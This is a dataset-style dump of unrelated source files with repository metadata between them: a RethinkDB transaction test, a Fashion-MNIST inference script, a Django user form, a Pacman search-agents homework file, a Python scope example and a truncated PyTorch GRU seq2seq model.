class WorkerThread(threading.Thread):
def __init__(self, account_ids):
super(WorkerThread, self).__init__()
self.account_ids = account_ids
def run(self):
with mocks.get_connection() as conn:
perform_work(conn, self.account_ids)
class ConcurrentTransactionsTestCase(unittest.TestCase):
def setUp(self):
super(ConcurrentTransactionsTestCase, self).setUp()
with mocks.get_connection() as conn:
if isinstance(conn, mocks.ConnectionMock):
self.skipTest('Mocked connection not supported')
self._ensure_provisioned(conn)
self.account_ids = self._create_accounts(conn, NUM_ACCOUNTS)
@staticmethod
def _ensure_provisioned(conn):
def ignore_exc(fn, *args, **kwargs):
try:
return fn(*args, **kwargs)
except Exception:
LOG.debug('Ignored exception', exc_info=True)
ignore_exc(rethinkdb.db_create(conn.db).run, conn)
ignore_exc(rethinkdb.table_create('accounts').run, conn)
ignore_exc(rethinkdb.table_create('transactions').run, conn)
rethinkdb.table('accounts').delete().run(conn)
rethinkdb.table('transactions').delete().run(conn)
@staticmethod
def _create_accounts(conn, num_accounts):
account_ids = []
with rethinktx.Transaction(conn) as tx:
accounts_tbl = tx.table('accounts')
for i in six.moves.range(num_accounts):
key = str(uuid.uuid4())
account_ids.append(key)
accounts_tbl.put(key, {'index': i, 'balance': 0})
return account_ids
def _total_balance(self):
with mocks.get_connection() as conn:
total_balance = 0
with rethinktx.Transaction(conn) as tx:
accounts_tbl = tx.table('accounts')
for account_id in self.account_ids:
total_balance += accounts_tbl.get(account_id)['balance']
return total_balance
@staticmethod
def _show_stats():
with mocks.get_connection() as conn:
num_committed = rethinkdb.table('transactions')\
.filter({'status': 'committed'}).count().run(conn)
num_aborted = rethinkdb.table('transactions')\
.filter({'status': 'aborted'}).count().run(conn)
LOG.info('Committed transactions: %d; Aborted transaction: %d',
num_committed, num_aborted)
def test_concurrent_transactions(self):
workers = []
for _ in six.moves.range(NUM_THREADS):
worker = WorkerThread(self.account_ids)
workers.append(worker)
worker.start()
for worker in workers:
worker.join()
self._show_stats()
self.assertEqual(0, self._total_balance())
|
[
"frolov.anton@gmail.com"
] |
frolov.anton@gmail.com
|
2516a2bd1fa7c23e64c179adee06fce8c112efc9
|
59b55a64d9340ef6ee7544c47b4c0086bf797236
|
/scripts/run_full_image.py
|
360a7b0b18a6b2d73edb97934fac0b73b9300056
|
[] |
no_license
|
Jeronics/fashion-mnist-test-case
|
eda3c70d7b5e5113203d39ec5506acd79356148c
|
0b15855e7222e17345d20ca946b0d86c2d1ae29d
|
refs/heads/master
| 2022-10-06T06:34:11.643639
| 2020-06-03T08:23:58
| 2020-06-03T08:23:58
| 268,487,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
############################# IMPORTS #############################
import os.path as path
import pickle
import numpy as np
import torch
import torchvision.transforms as transforms
from models.networks import ProductionCNN2
from utils.application_utils import get_label_and_bounding_box, create_image
from utils.config import MEAN_PIXEL, STD_PIXEL, ARTIFACTS_DIR
###################################################################
if __name__ == "__main__":
np.random.seed(1)
image_name = "test_long_image"
pil_image = create_image(image_name)
default_transformation = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((MEAN_PIXEL,), (STD_PIXEL,))
])
pil_image = default_transformation(pil_image)
pil_image = pil_image.unsqueeze(0)
model_name = 'cnn_3'
# loading
with open(path.join(ARTIFACTS_DIR, model_name + '.pkl'), 'rb') as f:
cvGridSearch = pickle.load(f)
model = ProductionCNN2(state_dict=cvGridSearch.best_model.module_.state_dict()).eval()
print(type(pil_image))
with torch.no_grad():
class_idx, image_with_contour = get_label_and_bounding_box(model, pil_image)
|
[
"jeronicarandell@gmail.com"
] |
jeronicarandell@gmail.com
|
917682f58de05483c2d7dcd124010513ed4badc8
|
a1f53b731fd1e3eb1923fb39fcb01477aa45f5c0
|
/blogapp/form.py
|
fb40e9ed2e05b6ad0de2524ac88315822acdc8f1
|
[] |
no_license
|
arseni2/djangoblog
|
76922d4abd7550bfb8a9b0514eda727699e57e37
|
b3b8e1a30c4f2860719d62736571e6aa4d0258df
|
refs/heads/main
| 2023-03-23T07:27:43.091875
| 2021-03-20T22:41:16
| 2021-03-20T22:41:16
| 346,117,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 481
|
py
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from django.contrib.auth import get_user_model
CustomUser = get_user_model()
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = CustomUser
fields = UserCreationForm.Meta.fields+('age','email')
class CustomUserChangeForm(UserChangeForm):
class Meta:
model = CustomUser
fields = UserChangeForm.Meta.fields
|
[
"arc-37@mail.ru"
] |
arc-37@mail.ru
|
c7f7d55da80fa96f610e72e41a113d2b31b4f2a4
|
cb6ea8cffe592d5ecbae3581c15143836d9714fd
|
/1. Search/search/searchAgents.py
|
efaa50237bafa0577d76b28568a39f67d1a9410b
|
[] |
no_license
|
pswaroopk/pacman-ai
|
a51d421f6b4ebe1f2f55830a0ef2a1c1f6ae8607
|
64b971d82db73780c5e6c9561666ba86f8ff314a
|
refs/heads/master
| 2020-06-27T22:34:02.231705
| 2017-07-13T03:23:10
| 2017-07-13T03:23:10
| 97,074,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,146
|
py
|
# searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
"An agent that goes West until it can't."
def getAction(self, state):
"The agent receives a GameState (defined in pacman.py)."
if Directions.WEST in state.getLegalPacmanActions():
return Directions.WEST
else:
return Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
"""
This very general search agent finds a path using a supplied search
algorithm for a supplied search problem, then returns actions to follow that
path.
As a default, this agent runs DFS on a PositionSearchProblem to find
location (1,1)
Options for fn include:
depthFirstSearch or dfs
breadthFirstSearch or bfs
Note: You should NOT change any code in SearchAgent
"""
def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
# Warning: some advanced Python magic is employed below to find the right functions and problems
# Get the search function from the name and heuristic
if fn not in dir(search):
raise AttributeError, fn + ' is not a search function in search.py.'
func = getattr(search, fn)
if 'heuristic' not in func.func_code.co_varnames:
print('[SearchAgent] using function ' + fn)
self.searchFunction = func
else:
if heuristic in globals().keys():
heur = globals()[heuristic]
elif heuristic in dir(search):
heur = getattr(search, heuristic)
else:
raise AttributeError, heuristic + ' is not a function in searchAgents.py or search.py.'
print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
# Note: this bit of Python trickery combines the search algorithm and the heuristic
self.searchFunction = lambda x: func(x, heuristic=heur)
# Get the search problem type from the name
if prob not in globals().keys() or not prob.endswith('Problem'):
raise AttributeError, prob + ' is not a search problem type in SearchAgents.py.'
self.searchType = globals()[prob]
print('[SearchAgent] using problem type ' + prob)
def registerInitialState(self, state):
"""
This is the first time that the agent sees the layout of the game
board. Here, we choose a path to the goal. In this phase, the agent
should compute the path to the goal and store it in a local variable.
All of the work is done in this method!
state: a GameState object (pacman.py)
"""
if self.searchFunction == None: raise Exception, "No search function provided for SearchAgent"
starttime = time.time()
problem = self.searchType(state) # Makes a new search problem
self.actions = self.searchFunction(problem) # Find a path
totalCost = problem.getCostOfActions(self.actions)
print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
def getAction(self, state):
"""
Returns the next action in the path chosen earlier (in
registerInitialState). Return Directions.STOP if there is no further
action to take.
state: a GameState object (pacman.py)
"""
if 'actionIndex' not in dir(self): self.actionIndex = 0
i = self.actionIndex
self.actionIndex += 1
if i < len(self.actions):
return self.actions[i]
else:
return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
"""
A search problem defines the state space, start state, goal test, successor
function and cost function. This search problem can be used to find paths
to a particular point on the pacman board.
The state space consists of (x,y) positions in a pacman game.
Note: this search problem is fully specified; you should NOT change it.
"""
def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
"""
Stores the start and goal.
gameState: A GameState object (pacman.py)
costFn: A function from a search state (tuple) to a non-negative number
goal: A position in the gameState
"""
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
if start != None: self.startState = start
self.goal = goal
self.costFn = costFn
self.visualize = visualize
if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
print 'Warning: this does not look like a regular search maze'
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def getStartState(self):
return self.startState
def isGoalState(self, state):
isGoal = state == self.goal
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state)
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextState = (nextx, nexty)
cost = self.costFn(nextState)
successors.append( ( nextState, action, cost) )
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state not in self._visited:
self._visited[state] = True
self._visitedlist.append(state)
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999.
"""
if actions == None: return 999999
x,y= self.getStartState()
cost = 0
for action in actions:
# Check figure out the next state and see whether its' legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
cost += self.costFn((x,y))
return cost
class StayEastSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the West side of the board.
The cost function for stepping into a position (x,y) is 1/2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: .5 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the East side of the board.
The cost function for stepping into a position (x,y) is 2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: 2 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn)
def manhattanHeuristic(position, problem, info={}):
"The Manhattan distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def euclideanHeuristic(position, problem, info={}):
"The Euclidean distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return ( (xy1[0] - xy2[0]) ** 2 + (xy1[1] - xy2[1]) ** 2 ) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
#import pdb; pdb.set_trace()
class CornersProblem(search.SearchProblem):
"""
This search problem finds paths through all four corners of a layout.
You must select a suitable state space and successor function
"""
def __init__(self, startingGameState,costFn = lambda x: 1, start=None, visualize=True):
"""
Stores the walls, pacman's starting position and corners.
"""
self.gameState = startingGameState
self.walls = startingGameState.getWalls()
self.startingPosition = startingGameState.getPacmanPosition()
top, right = self.walls.height-2, self.walls.width-2
self.corners = ((1,1), (1,top), (right, 1), (right, top))
for corner in self.corners:
if not startingGameState.hasFood(*corner):
print 'Warning: no food in corner ' + str(corner)
self._expanded = 0 # DO NOT CHANGE; Number of search nodes expanded
# Please add any code here which you would like to use
# in initializing the problem
"*** YOUR CODE HERE ***"
self.costFn = costFn
self.visualize = visualize
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def updateGoalState(self, state):
distance = 999999
goal = self.goal
for corner in self.corners:
currDist = util.manhattanDistance(state, corner)
if distance > currDist:
goal = corner
self.goal = goal
def getStartState(self):
"""
Returns the start state (in your state space, not the full Pacman state
space)
"""
"*** YOUR CODE HERE ***"
"""startState = ( (x,y), [False, False, False, False])"""
return (self.startingPosition, [False, False, False, False])
def isGoalState(self, state):
"""
Returns whether this search state is a goal state of the problem.
"""
"*** YOUR CODE HERE ***"
"""goal = ( (x,y), [True, True, True, True])"""
isGoal = state[1][0] and state[1][1] and state[1][2] and state[1][3]
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state[0])
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost'
is the incremental cost of expanding to that successor
"""
"""
My state space is defined as s[(x,y), [False, True, True, False]] based on the state of the corner visited or not
goal: s((x,y), [True, True, True, True])
start: s((x,y), [False, False, False, False])
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
"*** YOUR CODE HERE ***"
""" Pack the status of the corners visited, if nextState is corner, mark that corner trues"""
x,y = state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextState = (nextx, nexty)
corners = [False, False, False, False]
for i, corner in enumerate(self.corners):
corners[i] = nextState == corner or state[1][i]
cost = self.costFn(nextState)
successors.append( ((nextState,corners), action, cost ))
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state[0] not in self._visited:
self._visited[state[0]] = True
self._visitedlist.append(state[0])
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999. This is implemented for you.
"""
if actions == None: return 999999
x,y= self.startingPosition
for action in actions:
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
return len(actions)
def cornersHeuristic(state, problem):
"""
A heuristic for the CornersProblem that you defined.
state: The current search state
(a data structure you chose in your search problem)
problem: The CornersProblem instance for this layout.
This function should always return a number that is a lower bound on the
shortest path from the state to a goal of the problem; i.e. it should be
admissible (as well as consistent).
"""
corners = problem.corners # These are the corner coordinates
walls = problem.walls # These are the walls of the maze, as a Grid (game.py)
"""
Logic: Visit all the food positions and add them to the heuristic. It will give you the optimal path for
visiting all the corners and remove them from visitedList.
"""
if problem.isGoalState(state): return 0
visited = [False, False, False, False]
for i, bVal in enumerate(state[1]):
visited[i] = bVal
heuristic = 0
currPos = state[0]
while not all(visited):
listDist = []
for index, corner in enumerate(corners):
if not visited[index]:
listDist.append((corner, index, util.manhattanDistance(currPos, corner)))
#listDist.append( (corner, index, mazeDistance(currPos, corner, problem.gameState) ))
currPos, i, distance = min(listDist, key=lambda item:item[2])
visited[i] = True
heuristic += distance
return heuristic
class AStarCornersAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, cornersHeuristic)
self.searchType = CornersProblem
class FoodSearchProblem:
"""
A search problem associated with finding the a path that collects all of the
food (dots) in a Pacman game.
A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
"""
def __init__(self, startingGameState):
self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
self.walls = startingGameState.getWalls()
self.startingGameState = startingGameState
self._expanded = 0 # DO NOT CHANGE
self.heuristicInfo = {} # A dictionary for the heuristic to store information
self.testVal = 0
def getStartState(self):
return self.start
def isGoalState(self, state):
return state[1].count() == 0
def getSuccessors(self, state):
"Returns successor states, the actions they require, and a cost of 1."
successors = []
self._expanded += 1 # DO NOT CHANGE
for direction in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state[0]
dx, dy = Actions.directionToVector(direction)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextFood = state[1].copy()
nextFood[nextx][nexty] = False
successors.append( ( ((nextx, nexty), nextFood), direction, 1) )
return successors
def getCostOfActions(self, actions):
"""Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999"""
x,y= self.getStartState()[0]
cost = 0
for action in actions:
# figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]:
return 999999
cost += 1
return cost
class AStarFoodSearchAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
# """
# Your heuristic for the FoodSearchProblem goes here.
#
# This heuristic must be consistent to ensure correctness. First, try to come
# up with an admissible heuristic; almost all admissible heuristics will be
# consistent as well.
#
# If using A* ever finds a solution that is worse uniform cost search finds,
# your heuristic is *not* consistent, and probably not admissible! On the
# other hand, inadmissible or inconsistent heuristics may find optimal
# solutions, so be careful.
#
# The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
# (see game.py) of either True or False. You can call foodGrid.asList() to get
# a list of food coordinates instead.
#
# If you want access to info like walls, capsules, etc., you can query the
# problem. For example, problem.walls gives you a Grid of where the walls
# are.
#
# If you want to *store* information to be reused in other calls to the
# heuristic, there is a dictionary called problem.heuristicInfo that you can
# use. For example, if you only want to count the walls once and store that
# value, try: problem.heuristicInfo['wallCount'] = problem.walls.count()
# Subsequent calls to this heuristic can access
# problem.heuristicInfo['wallCount']
# """
position, foodGrid = state
'''Current position of the pacman'''
"""
Logic: We explore the nearest Food position and then find maximum distance and between two food positons from that
By covering the farthest distance, we can avoid visiting or increaing the heuristic for intermediate food positions
"""
if problem.isGoalState(state): return 0
foodList = []
#Find the closest position
for foodPos in foodGrid.asList():
if foodGrid[foodPos[0]][foodPos[1]]:
foodList.append( (foodPos, mazeDistance(foodPos, position, problem.startingGameState ) ) )
if len(foodList) == 0: return 0
nearPosition, nearDistance = min(foodList, key=lambda item:item[1])
#Find the maximum distance between two food points
maxDistance = max(mazeDistance(nearPosition, foodPos, problem.startingGameState) for foodPos, dist in foodList)
return nearDistance + maxDistance
class ClosestDotSearchAgent(SearchAgent):
"Search for all food using a sequence of searches"
def registerInitialState(self, state):
self.actions = []
currentState = state
while(currentState.getFood().count() > 0):
nextPathSegment = self.findPathToClosestDot(currentState) # The missing piece
self.actions += nextPathSegment
for action in nextPathSegment:
legal = currentState.getLegalActions()
if action not in legal:
t = (str(action), str(currentState))
raise Exception, 'findPathToClosestDot returned an illegal move: %s!\n%s' % t
currentState = currentState.generateSuccessor(0, action)
self.actionIndex = 0
print 'Path found with cost %d.' % len(self.actions)
def findPathToClosestDot(self, gameState):
"""
Returns a path (a list of actions) to the closest dot, starting from
gameState.
"""
# Here are some useful elements of the startState
startPosition = gameState.getPacmanPosition()
food = gameState.getFood()
walls = gameState.getWalls()
problem = AnyFoodSearchProblem(gameState)
"*** YOUR CODE HERE ***"
#return search.depthFirstSearch(problem)
return search.uniformCostSearch(problem)
util.raiseNotDefined()
class AnyFoodSearchProblem(PositionSearchProblem):
"""
A search problem for finding a path to any food.
This search problem is just like the PositionSearchProblem, but has a
different goal test, which you need to fill in below. The state space and
successor function do not need to be changed.
The class definition above, AnyFoodSearchProblem(PositionSearchProblem),
inherits the methods of the PositionSearchProblem.
You can use this search problem to help you fill in the findPathToClosestDot
method.
"""
def __init__(self, gameState):
"Stores information from the gameState. You don't need to change this."
# Store the food for later reference
self.food = gameState.getFood()
# Store info for the PositionSearchProblem (no need to change this)
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
self.costFn = lambda x: 1
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def isGoalState(self, state):
"""
The state is Pacman's position. Fill this in with a goal test that will
complete the problem definition.
"""
x,y = state
return self.food[x][y]
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def mazeDistance(point1, point2, gameState):
"""
Returns the maze distance between any two points, using the search functions
you have already built. The gameState can be any game state -- Pacman's
position in that state is ignored.
Example usage: mazeDistance( (2,4), (5,6), gameState)
This might be a useful helper function for your ApproximateSearchAgent.
"""
x1, y1 = point1
x2, y2 = point2
walls = gameState.getWalls()
assert not walls[x1][y1], 'point1 is a wall: ' + str(point1)
assert not walls[x2][y2], 'point2 is a wall: ' + str(point2)
prob = PositionSearchProblem(gameState, start=point1, goal=point2, warn=False, visualize=False)
return len(search.bfs(prob))
|
[
"swaroopkpydisetty@gmail.com"
] |
swaroopkpydisetty@gmail.com
|
1f7a73fb2528f3c82b8b5f1b7691f0bf7f9c572a
|
6040ec2771a81654ac41f33ce5c4aa7e66d4e5d9
|
/src/파이썬코드(py)/Ch06/code_6_8_2.py
|
5b3b1e11fc54f5ace2dfd3b7cd1cebb773201c31
|
[] |
no_license
|
jinseoo/DataSciPy
|
a3462785ae094530141e66ead8de9e6519fbf193
|
de6127c0741f8d0cfc989e17ba3a5a65004e5d9c
|
refs/heads/master
| 2023-06-25T19:03:22.086126
| 2021-07-27T09:01:41
| 2021-07-27T09:01:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
#
# 따라하며 배우는 파이썬과 데이터과학(생능출판사 2020)
# 6.8 변수의 범위는 어디까지인가, 155쪽
#
def print_counter():
counter = 200
print('counter =', counter) # 함수 내부의 counter 값
counter = 100
print_counter()
print('counter =', counter) # 함수 외부의 counter 값
|
[
"hojoon1619@gmail.com"
] |
hojoon1619@gmail.com
|
101f2007b71bc63efbdd759b3ee37b183fdd834e
|
a7ba18930a3c84dba19ed0f2f580e6c759e1d0b9
|
/gru_model.py
|
fc37a98f6d4c49e8544c9c4da1aca62c9822d342
|
[] |
no_license
|
soaxelbrooke/twitter-cs-seq2seq
|
4b2dec6badc9f0000702b1fdd0ef17ef91d67d5e
|
c0ca22273150abf76a4a4e2795b7d7d507268d91
|
refs/heads/master
| 2021-07-19T09:05:26.667954
| 2017-10-25T10:32:39
| 2017-10-25T10:32:39
| 106,000,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,672
|
py
|
from collections import deque
import torch
from numpy import ndarray
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
import random
from torch import optim
from tqdm import tqdm
import numpy as np
from typing import NamedTuple
Seq2SeqConfig = NamedTuple('Seq2SeqParams', (
('message_len', int),
('batch_size', int),
('context_size', int),
('embed_size', int),
('use_cuda', bool),
('vocab_size', int),
('start_token', str),
('encoder_layers', int),
('learning_rate', float),
('teacher_force_ratio', float),
))
def build_model(cfg, start_idx, pad_idx):
# type: (Seq2SeqConfig, int, int) -> GruModel
""" Builds a bomb ass model """
shared_embedding = build_shared_embedding(cfg, pad_idx)
encoder = GruEncoder(cfg, shared_embedding, 1)
decoder = GruDecoder(cfg, shared_embedding, 1)
if cfg.use_cuda:
encoder.cuda()
decoder.cuda()
return GruModel(cfg, encoder, decoder, shared_embedding, start_idx)
def build_shared_embedding(cfg, pad_idx):
""" Builds embedding to be used by encoder and decoder """
# type: (Seq2SeqConfig, int) -> nn.Embedding
return nn.Embedding(cfg.vocab_size, cfg.embed_size, padding_idx=int(pad_idx))
class GruModel:
def __init__(self, seq2seq_cfg, encoder, decoder, embedding, start_idx):
# type: (Seq2SeqConfig, GruEncoder, GruDecoder, nn.Embedding, int) -> None
self.cfg = seq2seq_cfg
self.encoder = encoder
self.decoder = decoder
self.embedding = embedding
self.start_idx = start_idx
self.gradient_clip = 5.0
self.teacher_force_ratio = seq2seq_cfg.teacher_force_ratio
self.learning_rate = seq2seq_cfg.learning_rate
self.encoder_optimizer = optim.RMSprop(self.encoder.parameters(), lr=self.learning_rate)
self.decoder_optimizer = optim.RMSprop(self.decoder.parameters(), lr=self.learning_rate)
self.loss_fn = nn.NLLLoss()
def teacher_should_force(self):
return random.random() < self.teacher_force_ratio
def train_epoch(self, train_x, train_y, experiment=None):
# type: (ndarray, ndarray) -> float
""" Trains a single epoch. Returns training loss. """
progress = tqdm(total=len(train_x))
loss_queue = deque(maxlen=256)
train_x = train_x.astype('int64')
train_y = train_y.astype('int64')
idx_iter = zip(range(0, len(train_x) - self.cfg.batch_size, self.cfg.batch_size),
range(self.cfg.batch_size, len(train_x), self.cfg.batch_size))
total_loss = 0
last_step = 1
for step, (start, end) in enumerate(idx_iter):
x_batch = train_x[start:end]
y_batch = train_y[start:end]
if (len(x_batch) == 0) or (len(y_batch) == 0):
break
x_batch = torch.LongTensor(x_batch)
y_batch = torch.LongTensor(y_batch)
if self.cfg.use_cuda:
x_batch = x_batch.cuda()
y_batch = y_batch.cuda()
loss = self._train_inner(
Variable(x_batch.view(-1, self.cfg.batch_size)),
Variable(y_batch.view(-1, self.cfg.batch_size)),
)
if (experiment is not None) and ((step + 1) % 20 == 0):
experiment.log_metric('loss', np.mean(loss_queue))
total_loss += loss
loss_queue.append(loss)
progress.set_postfix(loss=np.mean(loss_queue), refresh=False)
progress.update(self.cfg.batch_size)
last_step = step + 1
avg_loss = total_loss / last_step
if experiment is not None:
experiment.log_metric('loss', avg_loss)
return avg_loss
def _train_inner(self, input_var_batch, target_var_batch):
# type: (ndarray, ndarray) -> float
self.encoder_optimizer.zero_grad()
self.decoder_optimizer.zero_grad()
loss = 0
enc_hidden_state = self.encoder.init_hidden()
encoder_outputs, decoder_hidden = self.encoder(input_var_batch, enc_hidden_state)
decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
if self.cfg.use_cuda:
decoder_input = decoder_input.cuda()
should_use_teacher = self.teacher_should_force()
for input_idx in range(self.cfg.message_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
loss += self.loss_fn(decoder_output, target_var_batch[input_idx, :])
if should_use_teacher:
decoder_input = target_var_batch[input_idx, :]
else:
# Get the highest values and their indexes over axis 1
top_vals, top_idxs = decoder_output.data.topk(1)
decoder_input = Variable(top_idxs.squeeze())
loss.backward()
nn.utils.clip_grad_norm(self.encoder.parameters(), self.gradient_clip)
nn.utils.clip_grad_norm(self.decoder.parameters(), self.gradient_clip)
self.encoder_optimizer.step()
self.decoder_optimizer.step()
return loss.data.sum() / self.cfg.message_len
def predict(self, requests):
""" Predict a response for this request """
# type: (ndarray) -> ndarray
x = torch.LongTensor(requests.astype('int64')).view(-1, self.cfg.batch_size)
if self.cfg.use_cuda:
x = x.cuda()
encoder_outputs, decoder_hidden = self.encoder(Variable(x), self.encoder.init_hidden())
decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
decoder_outputs = \
torch.LongTensor([[self.start_idx]] * self.cfg.batch_size * self.cfg.message_len)\
.view(self.cfg.message_len, self.cfg.batch_size)
if self.cfg.use_cuda:
decoder_input = decoder_input.cuda()
should_use_teacher = self.teacher_should_force()
for input_idx in range(self.cfg.message_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
top_vals, top_idxs = decoder_output.data.topk(1)
decoder_input = Variable(top_idxs.squeeze())
decoder_outputs[input_idx, :] = top_idxs.squeeze()
return decoder_outputs.numpy().T
def evaluate(self, test_x, test_y):
# type: (ndarray, ndarray) -> float
""" Evaluates model quality on test dataset, returning loss. """
class GruEncoder(nn.Module):
def __init__(self, seq2seq_params, embedding, n_layers=1):
# type: (Seq2SeqConfig, nn.Embedding, int) -> None
super(GruEncoder, self).__init__()
self.cfg = seq2seq_params
self.n_layers = seq2seq_params.encoder_layers
self.embedding = embedding
self.rnn = nn.GRU(
input_size=self.cfg.embed_size,
hidden_size=self.cfg.context_size,
num_layers=self.n_layers,
)
def forward(self, word_idxs, hidden_state):
embedded = self.embedding(word_idxs) \
.view(self.cfg.message_len, self.cfg.batch_size, self.cfg.embed_size)
out, hidden = self.rnn(embedded, hidden_state)
return out[-1].unsqueeze(0), hidden[-1].unsqueeze(0)
def init_hidden(self):
hidden = Variable(torch.zeros(self.n_layers, self.cfg.batch_size, self.cfg.context_size))
return hidden.cuda() if self.cfg.use_cuda else hidden
class GruDecoder(nn.Module):
def __init__(self, seq2seq_params, embedding, n_layers, dropout_p=0.1):
# type: (Seq2SeqConfig, nn.Embedding, int, float) -> None
super(GruDecoder, self).__init__()
self.cfg = seq2seq_params
self.n_layers = n_layers
self.dropout_p = dropout_p
self.embedding = embedding
self.dropout = nn.Dropout(self.dropout_p)
self.rnn = nn.GRU(
input_size=self.cfg.embed_size,
